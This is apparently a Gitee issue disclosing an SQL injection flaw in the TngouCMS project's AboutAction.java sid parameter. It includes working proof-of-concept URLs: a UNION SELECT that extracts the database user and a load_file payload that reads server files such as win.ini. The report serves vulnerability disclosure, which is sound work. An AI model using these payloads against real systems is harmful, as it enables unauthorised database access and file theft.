78 Star 117 Fork 81

tngou / TngouCMS

 / 详情

SQL Injection Vulnerability

待办的
创建于  
2021-10-30 09:27

Parameter sid not strictly filtered in AboutAction.java leads to SQL injection

http://127.0.0.1:8080/TngouCMS/action/about/execute/(-1)union(select(1),(2),(3),(user()),(5),(6),(now()))/

输入图片说明
If the mysql configuration enables secure_file_priv='', we can read any file:

http://127.0.0.1:8080/TngouCMS/action/about/execute/(-1)union(select(1),(2),(3),(select(substr(load_file(0x633a2f2f77696e646f77732f77696e2e696e69),1,30))),(5),(6),(now()))/

输入图片说明

评论 (0)

tyaoo 创建了任务
tyaoo 修改了描述
tyaoo 修改了标题
展开全部操作日志

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
Java
1
https://gitee.com/397713572/TngouCMS.git
git@gitee.com:397713572/TngouCMS.git
397713572
TngouCMS
TngouCMS

搜索帮助